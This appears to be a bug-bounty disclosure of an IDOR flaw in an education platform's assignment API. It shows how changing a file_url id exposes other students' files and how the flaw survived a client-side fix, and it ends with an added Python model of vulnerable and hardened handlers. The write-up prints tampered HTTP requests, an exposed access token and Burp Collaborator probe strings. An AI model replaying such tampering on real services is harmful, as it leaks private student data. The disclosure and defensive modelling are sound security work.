
IDOR Vulnerability in a Well-Known Online Education Platform (2)

{"title":"Assignment","student":"40994","section_id":"case","completed":false,"lesson":"26201","assignment":"4579","answers":[{"field_answer":"hello","field_question_ref":"4569"},"file_url":"5830"}

In the request above, file_url is a numeric identifier. By changing that number, another student's submitted assignment file can be attached to my own submission, and the other student's assignment information is returned in the response, as shown below:

HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 0
Cache-Control: no-cache, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Sun, 12 May 2019 18:01:07 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Server: Apache/2.2.15 (Red Hat)
Vary: Accept
Via: 1.1 varnish
WebServer: prod1-md
X-API-Version: v1.0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Drupal-Cache: MISS
X-Powered-By: PHP/7.1.23
X-Varnish: 762262632
Content-Length: 1465
Connection: Close
X-Iinfo: 14-119388817-119389061 NNNN CT(0 0 0) RT(1557684060144 1031) q(0 0 0 -1) r(55 55) U6
X-CDN: Incapsula

{"data":[REDUCTED"file_url":"https://files.xyz.org/user_files/simulation_27244/MD MEMO_0.docx","REDUCTED}}

After finding this vulnerability I reported it to the vendor promptly. Once the fix was in place and I retested, I found that the assignment submission request above still had an IDOR vulnerability. The post-fix assignment submission request looked like this:

PATCH /api/api/v1.0/lesson/30699/assessment_answer/30709 HTTP/1.1
Host: xyz.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Referer: https://xyz.org/
Access-Token: HNg-F0wiTIrxDtc1qDQL2TjHv-ERroxmIowIUkM8Blo
Content-Type: application/json; charset=utf-8
Content-Length: 1206
Cookie: [REDUCTED]

{"completed":true,"answers":[{"field_answer":"xyz.burpcollaborator.net","[Reducted]:"xyz.burpcollaborator.net","field_question_ref":"139"}]}

As you can see, the file_url parameter is indeed gone from the request. The request as shown in Burp Suite:

[Screenshot: the post-fix request in Burp Suite]

The response:

[Screenshot: the response to the post-fix request]

Strangely, the response body still contained a "file_url":null name-value pair. So I tried adding the file_url parameter back into the request, and sure enough it was accepted exactly as before the fix: the client had stopped sending the field, but the server still honoured it. The lesson is to learn to look at the response for parameters that the request no longer shows.

[Screenshot: the request with file_url added back, and its response]
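The two behaviours the post describes, modelled as plain Python so they run offline. This is an added example, not the platform's code: the student ids, file ids, the FILES table, the record store and the handler functions are all constructed for illustration. It shows the pre-fix handler that attaches any file id it is given, the hardened handler that checks ownership of both the record and the file and rejects fields outside its schema, and a regression check that would have caught the "hidden parameter" the post found after the first fix.

```python
# Added example (not the platform's code). All ids and data below are constructed.

# Constructed sample data: which student owns which uploaded file.
FILES = {
    "5830": {"owner": "40994", "url": "https://files.example/user_files/40994/essay.docx"},
    "5831": {"owner": "41000", "url": "https://files.example/user_files/41000/memo.docx"},
}

# Fields the assessment_answer PATCH endpoint is documented to accept (assumption).
ALLOWED_FIELDS = {"completed", "answers", "file_url"}


def fresh_store():
    """Constructed answer records keyed by answer id; each belongs to one student."""
    return {
        "30709": {"student": "40994", "completed": False, "answers": [], "file_url": None},
    }


def patch_vulnerable(store, auth_student, answer_id, body):
    """Pre-fix behaviour: every field in the body is copied onto the record.
    file_url is resolved with no check that the file belongs to the caller,
    so attaching another student's file id succeeds and leaks its URL."""
    rec = store[answer_id]                      # no check that the caller owns the record
    for key, value in body.items():
        if key == "file_url":
            rec["file_url"] = FILES[value]["url"]   # no ownership check on the file
        else:
            rec[key] = value
    return 200, rec


def patch_fixed(store, auth_student, answer_id, body):
    """Hardened behaviour:
    1. the caller must own the answer record being patched;
    2. fields outside the schema are rejected rather than silently accepted,
       so a field the client stopped sending cannot quietly keep working;
    3. a file id may only be attached if the caller owns that file."""
    rec = store.get(answer_id)
    if rec is None or rec["student"] != auth_student:
        return 404, {"error": "not found"}      # same answer whether the record exists or not
    unknown = set(body) - ALLOWED_FIELDS
    if unknown:
        return 400, {"error": "unknown fields", "fields": sorted(unknown)}
    if "file_url" in body:
        f = FILES.get(body["file_url"])
        if f is None or f["owner"] != auth_student:
            return 403, {"error": "file not owned by caller"}
        rec["file_url"] = f["url"]
    for key in ("completed", "answers"):
        if key in body:
            rec[key] = body[key]
    return 200, rec


def accepts_hidden_field(handler, field, value):
    """Regression check for the lesson in the post: send a field the client UI
    no longer sends and see whether the server still honours it. Returns True
    when the server accepted the request and set the field, i.e. the bug is
    still present on the server side."""
    store = fresh_store()
    status, rec = handler(store, "40994", "30709", {"completed": True, field: value})
    return status == 200 and rec.get(field) is not None
```

Running accepts_hidden_field(patch_vulnerable, "file_url", "5831") reproduces the finding (another student's file id is accepted), while the same call against patch_fixed returns False. The design point is that removing a field from the client is not a fix; the server has to enforce ownership and a field allowlist regardless of what the client sends.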
